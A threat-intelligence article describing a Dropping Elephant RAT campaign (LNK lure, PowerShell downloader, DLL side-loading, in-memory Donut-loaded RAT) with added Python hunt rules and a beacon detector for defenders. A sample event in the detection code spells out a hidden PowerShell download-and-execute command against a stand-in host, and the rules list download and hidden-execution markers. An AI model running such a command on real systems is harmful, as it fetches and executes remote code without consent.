Dropping Elephant Resurfaces With Advanced In-Memory RAT Campaign

The threat actor known as Dropping Elephant has re-emerged with a significantly upgraded malware operation, leveraging a China-themed lure document and a sophisticated remote access trojan (RAT) designed to evade modern security controls.

Researchers at Rapid7 uncovered the latest Dropping Elephant RAT campaign during a proactive threat-hunting engagement and found that while the group’s core tradecraft remains recognizable, the underlying malware framework has undergone substantial refinement.

The campaign combines malicious shortcut files, PowerShell-based delivery, DLL side-loading, in-memory payload execution, and advanced anti-analysis techniques to provide attackers with persistent access while minimizing forensic visibility.

Key Details

The attack begins with a malicious Windows shortcut file named GRES3001.lnk, disguised as a PDF document associated with an industrial energy contract.

When opened, the shortcut silently executes an embedded PowerShell downloader while presenting the victim with a legitimate-looking decoy document related to a GRES-3 seawater pump contract.

Behind the scenes, the PowerShell script contacts a staging server hosted at chinagreenenergy[.]org, where additional malware components are retrieved.

Rapid7 researchers were able to obtain the entire malware toolkit because the staging infrastructure remained active during their investigation.

Their analysis identified multiple indicators linking the operation directly to previous Dropping Elephant campaigns, including:

  • Similar delivery mechanisms
  • Consistent screenshot collection behavior
  • Familiar command-and-control communication patterns
  • Reused command-handler architecture
  • Comparable beaconing logic

The findings suggest the group has evolved its malware capabilities without abandoning its established operational methodology.

Technical Analysis

One of the most notable aspects of the campaign is its sophisticated multi-stage execution chain.

After the initial PowerShell downloader runs, several files are staged within the C:\Users\Public directory.

Among them is a legitimate Microsoft executable named Fondue.exe, which is abused to perform DLL side-loading.

The attack chain unfolds as follows:

Stage 1: DLL Side-Loading

Fondue.exe loads a malicious DLL disguised as APPWIZ.cpl.

Because the executable is signed and trusted, this technique helps the attackers bypass certain security controls and blend into normal system activity.

Stage 2: Payload Decryption

The malicious DLL decrypts an encrypted file named editor.dat and passes the resulting payload to a Donut shellcode loader.

Stage 3: In-Memory Execution

The Donut loader maps the final RAT directly into memory.

Unlike conventional malware that writes executable files to disk, this approach leaves a significantly smaller forensic footprint and reduces the likelihood of detection by traditional antivirus solutions.

Once active, the malware performs extensive host reconnaissance before establishing encrypted communications with its command-and-control (C2) infrastructure hosted at gcl-power[.]org over HTTPS on port 443.

The RAT beacons to its operators every 10 seconds and supports:

  • Remote command execution
  • File uploads
  • File downloads
  • Directory enumeration
  • Screenshot capture
  • Host reconnaissance

Together, these capabilities provide attackers with complete operational control over infected systems.

Impact and Risks

The campaign presents significant risks for organizations across both public and private sectors.

Because the RAT operates entirely in memory and employs multiple layers of evasion, infected systems may remain compromised for extended periods without triggering traditional endpoint alerts.

Potential impacts include:

  • Long-term unauthorized access
  • Sensitive data theft
  • Credential harvesting
  • Internal reconnaissance
  • Lateral movement
  • Deployment of additional malware
  • Espionage operations
  • Follow-on ransomware activity

The malware’s ability to collect screenshots and execute arbitrary commands provides operators with real-time visibility into victim environments, increasing the risk of targeted data exfiltration and operational disruption.

Organizations that rely heavily on signature-based detection methods may struggle to identify infections before substantial damage occurs.

Expert Recommendations

Rapid7 advises defenders to focus on behavioral detection rather than relying solely on indicators of compromise (IOCs).

Because filenames, hashes, and infrastructure can change rapidly between campaigns, defenders should prioritize identifying suspicious activity patterns.

Monitor Shortcut-to-PowerShell Execution

Investigate instances where:

  • LNK files spawn PowerShell
  • PowerShell downloads content from external domains
  • Hidden PowerShell execution occurs

Hunt for Public Directory Staging

Monitor for suspicious files being written to:

C:\Users\Public\

Particularly when executable content, DLLs, or encrypted payloads appear unexpectedly.

Detect Suspicious Scheduled Tasks

A key detection opportunity involves the scheduled task:

GoogleErrorReport

Security teams should immediately investigate systems where this task launches executables from non-standard Windows directories.
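The three hunts above (shortcut-spawned PowerShell, staging under C:\Users\Public, and the GoogleErrorReport task) plus the DLL side-loading pattern from the Technical Analysis section, written as rules over normalised endpoint events. This is an added example, not Rapid7's tooling: the field names follow Sysmon conventions (Image, ParentImage, CommandLine, TargetFilename, ImageLoaded), the ScheduledTaskCreate record shape, the staging.example URL and every event in SAMPLE_EVENTS are constructed for the demonstration.

```python
# Added example (not Rapid7's tooling): hunt rules for the patterns described in the
# article, run over constructed Sysmon/Security-log style events normalised into dicts.
from typing import Callable, List, Tuple

Event = dict

PUBLIC_DIR = "c:\\users\\public\\"
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
STAGING_EXTS = (".exe", ".dll", ".cpl", ".dat", ".ps1")
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient", "http")
HIDDEN_MARKERS = ("-w hidden", "-windowstyle hidden", "-nop", "-enc")


def lnk_to_powershell(ev: Event) -> bool:
    """Explorer-spawned PowerShell (how a double-clicked .lnk runs) that hides itself or downloads."""
    if ev.get("EventType") != "ProcessCreate":
        return False
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "").lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")) or not parent.endswith("\\explorer.exe"):
        return False
    return any(m in cmd for m in DOWNLOAD_MARKERS) or any(m in cmd for m in HIDDEN_MARKERS)


def public_staging(ev: Event) -> bool:
    """Executable, DLL/CPL, script or opaque .dat written under the Public directory."""
    if ev.get("EventType") != "FileCreate":
        return False
    target = ev.get("TargetFilename", "").lower()
    return target.startswith(PUBLIC_DIR) and target.endswith(STAGING_EXTS)


def dll_sideload(ev: Event) -> bool:
    """Signed binary running outside trusted directories loads a DLL/CPL from a user-writable path."""
    if ev.get("EventType") != "ImageLoad":
        return False
    image = ev.get("Image", "").lower()
    loaded = ev.get("ImageLoaded", "").lower()
    return (ev.get("Signed") == "true"
            and not image.startswith(TRUSTED_DIRS)
            and loaded.endswith((".dll", ".cpl"))
            and not loaded.startswith(TRUSTED_DIRS))


def scheduled_task(ev: Event) -> bool:
    """The GoogleErrorReport task pointing at an executable outside the standard Windows directories."""
    if ev.get("EventType") != "ScheduledTaskCreate":
        return False
    action = ev.get("Action", "").lower()
    return ev.get("TaskName") == "GoogleErrorReport" and not action.startswith(TRUSTED_DIRS)


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("lnk_to_powershell", lnk_to_powershell),
    ("public_staging", public_staging),
    ("dll_sideload", dll_sideload),
    ("scheduled_task", scheduled_task),
]


def hunt(events) -> List[Tuple[str, int]]:
    """Return (rule_name, event_id) for every event that trips a rule."""
    return [(name, ev["Id"]) for ev in events for name, rule in RULES if rule(ev)]


# Constructed sample telemetry; the URL and record shapes are illustrative, not from the campaign.
SAMPLE_EVENTS = [
    {"Id": 1, "EventType": "ProcessCreate", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c IEX(New-Object Net.WebClient).DownloadString('https://staging.example/s1')"},
    {"Id": 2, "EventType": "FileCreate", "TargetFilename": r"C:\Users\Public\editor.dat"},
    {"Id": 3, "EventType": "FileCreate", "TargetFilename": r"C:\Users\Public\APPWIZ.cpl"},
    {"Id": 4, "EventType": "ImageLoad", "Signed": "true",
     "Image": r"C:\Users\Public\Fondue.exe", "ImageLoaded": r"C:\Users\Public\APPWIZ.cpl"},
    {"Id": 5, "EventType": "ImageLoad", "Signed": "true",  # benign: both images from System32
     "Image": r"C:\Windows\System32\fondue.exe", "ImageLoaded": r"C:\Windows\System32\appwiz.cpl"},
    {"Id": 6, "EventType": "ScheduledTaskCreate", "TaskName": "GoogleErrorReport",
     "Action": r"C:\Users\Public\Fondue.exe"},
    {"Id": 7, "EventType": "ProcessCreate", "ParentImage": r"C:\Windows\explorer.exe",  # benign
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Get-Date"},
    {"Id": 8, "EventType": "FileCreate", "TargetFilename": r"C:\Users\Public\report.pdf"},  # benign
]

if __name__ == "__main__":
    for name, event_id in hunt(SAMPLE_EVENTS):
        print(f"{name}: event {event_id}")
```

Each rule keys on behaviour rather than on a hash or domain, which is the point Rapid7 makes: the same rules still fire if the next campaign renames editor.dat or moves to a new staging host, while the benign events 5, 7 and 8 show the shape of the false positives the rules are built to exclude.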

Strengthen Endpoint Detection

Organizations should ensure their endpoint detection and response (EDR) platforms can identify:

  • Memory-resident malware
  • DLL side-loading activity
  • AMSI bypass attempts
  • ETW tampering
  • PowerShell abuse
  • Process injection techniques

Review Logging and Telemetry

Enable detailed logging for:

  • PowerShell execution
  • Scheduled task creation
  • Process creation events
  • DLL loading activity
  • Outbound HTTPS connections

Implement Network Monitoring

Monitor for beaconing patterns and unusual outbound communications to newly registered or suspicious infrastructure.
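A beacon that checks in every 10 seconds, as the RAT described above does, leaves a signature in connection timing even when the payload is encrypted and the destination is unknown. The following is an added example, not Rapid7's code: it groups outbound flows by source, destination and port and flags pairs whose inter-connection intervals are nearly constant. The flow-record format and every line in SAMPLE_FLOWS are constructed; the addresses are documentation ranges.

```python
# Added example (not Rapid7's tooling): periodicity check over constructed flow records
# of the form "timestamp,src,dst,dport", one connection per line.
from collections import defaultdict
from datetime import datetime
from statistics import median
from typing import Dict, List, Tuple

MIN_CONNECTIONS = 6   # below this, an interval estimate is not meaningful
MAX_SPREAD = 0.2      # median absolute deviation of the gaps divided by the median gap


def parse_flow(line: str) -> Tuple[float, str, str, int]:
    """Parse 'timestamp,src,dst,dport' into (epoch seconds, src, dst, dport)."""
    ts, src, dst, dport = line.strip().split(",")
    return datetime.fromisoformat(ts).timestamp(), src, dst, int(dport)


def find_beacons(lines, min_connections=MIN_CONNECTIONS, max_spread=MAX_SPREAD) -> List[Dict]:
    """Return one finding per (src, dst, dport) whose connections recur at a near-constant interval."""
    by_pair: Dict[Tuple[str, str, int], List[float]] = defaultdict(list)
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, dport = parse_flow(line)
        by_pair[(src, dst, dport)].append(ts)

    findings = []
    for pair, times in by_pair.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        med = median(gaps)
        if med <= 0:
            continue
        # MAD rather than standard deviation: a few jittered or dropped check-ins must not mask the pattern
        spread = median([abs(g - med) for g in gaps]) / med
        if spread <= max_spread:
            findings.append({"pair": pair, "connections": len(times),
                             "median_interval_s": round(med, 1), "spread": round(spread, 3)})
    return findings


# Constructed sample: a 10-second beacon (one check-in jittered by a second), ordinary browsing
# traffic at irregular times, and a pair with too few connections to judge.
SAMPLE_FLOWS = [
    "2024-05-01T10:00:00+00:00,10.0.0.5,203.0.113.10,443",
    "2024-05-01T10:00:10+00:00,10.0.0.5,203.0.113.10,443",
    "2024-05-01T10:00:20+00:00,10.0.0.5,203.0.113.10,443",
    "2024-05-01T10:00:31+00:00,10.0.0.5,203.0.113.10,443",
    "2024-05-01T10:00:40+00:00,10.0.0.5,203.0.113.10,443",
    "2024-05-01T10:00:50+00:00,10.0.0.5,203.0.113.10,443",
    "2024-05-01T10:01:00+00:00,10.0.0.5,203.0.113.10,443",
    "2024-05-01T10:01:10+00:00,10.0.0.5,203.0.113.10,443",
    "2024-05-01T10:00:03+00:00,10.0.0.5,198.51.100.7,443",
    "2024-05-01T10:00:47+00:00,10.0.0.5,198.51.100.7,443",
    "2024-05-01T10:02:15+00:00,10.0.0.5,198.51.100.7,443",
    "2024-05-01T10:02:16+00:00,10.0.0.5,198.51.100.7,443",
    "2024-05-01T10:05:40+00:00,10.0.0.5,198.51.100.7,443",
    "2024-05-01T10:09:02+00:00,10.0.0.5,198.51.100.7,443",
    "2024-05-01T10:00:05+00:00,10.0.0.5,192.0.2.9,443",
    "2024-05-01T10:00:15+00:00,10.0.0.5,192.0.2.9,443",
]

if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_FLOWS):
        print(finding)
```

Run over real flow logs, the findings list is a triage queue rather than a verdict: legitimate software also polls on fixed timers, so the next step is to check whether the destination is newly registered or otherwise unexpected, as the paragraph above recommends.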

Industry Context

The campaign reflects a broader trend toward stealth-focused malware frameworks that prioritize memory-only execution and defense evasion.

Threat actors increasingly rely on techniques such as:

  • In-memory payload delivery
  • DLL side-loading
  • Living-off-the-land binaries (LOLBins)
  • AMSI bypasses
  • ETW suppression
  • Encrypted command-and-control traffic

These methods are designed to undermine traditional security tooling and complicate both automated detection and manual incident response.

The use of Donut shellcode loaders, runtime API resolution, and control-flow flattening further demonstrates how modern threat actors are investing in anti-analysis capabilities traditionally associated with advanced persistent threat (APT) operations.

As endpoint protection technologies improve, attackers continue shifting toward behavioral evasion rather than relying solely on malware obfuscation.

Conclusion

Rapid7’s discovery of the latest Dropping Elephant operation highlights how established threat actors continue evolving their toolsets to stay ahead of defenders. By combining malicious shortcut files, PowerShell delivery, DLL side-loading, in-memory RAT execution, and extensive anti-analysis protections, the group has built a malware framework capable of maintaining persistent and stealthy access to victim environments.

For defenders, the campaign serves as a reminder that behavioral monitoring, threat hunting, and memory-focused detection capabilities are increasingly essential as attackers move beyond traditional file-based malware techniques.

FAQ

Who is Dropping Elephant?

Dropping Elephant is a long-tracked cyber threat actor known for conducting targeted malware campaigns that often use social engineering lures, remote access trojans, and stealth-focused persistence techniques.

What is the primary malware used in this campaign?

The campaign deploys a custom remote access trojan (RAT) that executes entirely in memory and provides attackers with full remote control of compromised systems.

Why is in-memory malware dangerous?

In-memory malware avoids writing its final payload to disk, making it more difficult for traditional antivirus and file-scanning tools to detect.

What is the GoogleErrorReport scheduled task?

GoogleErrorReport is a scheduled task the malware creates for persistence. It relaunches the execution chain every minute, so access is restored after a reboot or if the implant is terminated.

How can organizations detect this campaign?

Defenders should monitor for PowerShell launched by shortcut files, suspicious scheduled tasks, DLL side-loading behavior, AMSI tampering, ETW patching, and files staged in the C:\Users\Public directory.
